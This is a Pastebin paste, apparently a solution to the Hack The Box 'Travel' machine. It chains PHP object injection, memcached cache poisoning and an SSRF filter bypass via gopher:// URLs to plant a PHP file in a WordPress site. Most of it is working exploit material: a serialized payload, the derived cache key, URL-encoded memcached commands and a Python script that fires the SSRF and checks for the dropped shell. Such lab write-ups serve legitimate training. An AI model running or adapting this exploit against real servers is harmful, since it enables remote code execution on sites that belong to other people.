API tools faq
paste
Advertisement
Mr_hEx

Travel Box !

Mr_hEx
Jul 28th, 2020
250
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.60 KB | None | 0 0
raw download clone embed print report
  1. PHP Object Injection !!!
  2. Code :
  3. <?php
  4. class TemplateHelper{
  5.  
  6. public $file = "h3x.php";
  7. public $data = "<?php echo 'Mr_hex :( '; ";
  8. }
  9.  
  10. print serialize(new TemplateHelper);
  11.  
  12. ?>
  13. #OutPut :
  14. O:14:"TemplateHelper":2:{s:4:"file";s:7:"h3x.php";s:4:"data";s:25:"<?php echo 'Mr_hex :( '; ";}
  15.  
  16. let's set Value on memcached !!
  17. set xct_4e5612ba079c530a6b1f148c0b352241 4 0
  18. xct_
  19. look at this link !
  20. https://github.com/WordPress/WordPress/blob/master/wp-includes/SimplePie/Cache/Memcached.php#L84
  21. 'prefix' => 'simplepie_', by defulte !!
  22. so on script : xct_
  23. look at rss_template.php
  24. $simplepie->set_cache_location('memcache://127.0.0.1:11211/?timeout=60&prefix=xct_');
  25.  
  26. 4e5612ba079c530a6b1f148c0b352241
  27. http://www.travel.htb/newsfeed/customfeed.xml => md5 => 3903a76d1e6fef0d76e973a0561cbfc0
  28. 3903a76d1e6fef0d76e973a0561cbfc0:spc => md5 => 4e5612ba079c530a6b1f148c0b352241
  29. let's see here :
  30. https://github.com/tarunkant/Gopherus/blob/master/scripts/PHPMemcached.py
  31. payload = "%0d%0aset SpyD3r 4 0 " + str(len(code)) + "%0d%0a" + code + "%0d%0a"
  32. SpyD3r = xct_4e5612ba079c530a6b1f148c0b352241
  33. code = O:14:"TemplateHelper":2:{s:4:"file";s:7:"hex.php";s:4:"data";s:25:"<?php echo 'Mr_hex :( '; ";}
  34. str(len(code)) = len of code
  35. payload = "_%0d%0aset%20xct_4e5612ba079c530a6b1f148c0b352241%204%200%2095%0d%0aO:14:"TemplateHelper":2:{s:4:"file";s:7:"hex.php";s:4:"data";s:25:"<?php echo 'Mr_hex :( '; ";}%0d%0a"
  36. replace "+" to "%20" and replace "%25" to "%"
  37.  
  38. then let's set value throug SSRF
  39. there are a lot of ways to bypass SSRF filter !
  40. read here : https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
  41. we'll use gopher wrapper
  42. https://github.com/tarunkant/Gopherus
  43.  
  44. Python Script !
  45.  
  46.  
  47. import requests
  48. import urllib
  49.  
  50. url = "http://blog.travel.htb/"
  51. code = """O:14:"TemplateHelper":2:{s:4:"file";s:7:"hex.php";s:4:"data";s:25:"<?php echo 'Mr_hex :( '; ";}"""
  52. payload = "%0d%0aset xct_4e5612ba079c530a6b1f148c0b352241 4 0 " + str(len(code)) + "%0d%0a" + code + "%0d%0a"
  53. encodPayload = urllib.quote_plus(payload).replace("+","%20").replace("%25","%")
  54. exploit = "gopher://0:11211/_{}".format(encodPayload)
  55.  
  56. print("[+] Trying to inject payload !!")
  57.  
  58. ssrf_url = url+"awesome-rss/?debug=yes&custom_feed_url="+exploit
  59. print("[+] {}".format(ssrf_url))
  60. r = requests.get(ssrf_url)
  61.  
  62. r = requests.get(url+"awesome-rss/")
  63. check_shell = url + "wp-content/themes/twentytwenty/logs/hex.php"
  64.  
  65. r_check = requests.get(check_shell)
  66. if r_check.status_code == 200:
  67. print("[+] Your php shell : {}".format(check_shell))
  68. else:
  69. print("[-] something went wrong !!")
  70.  
  71. print("[+] Have a Good Time ):")
  72.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!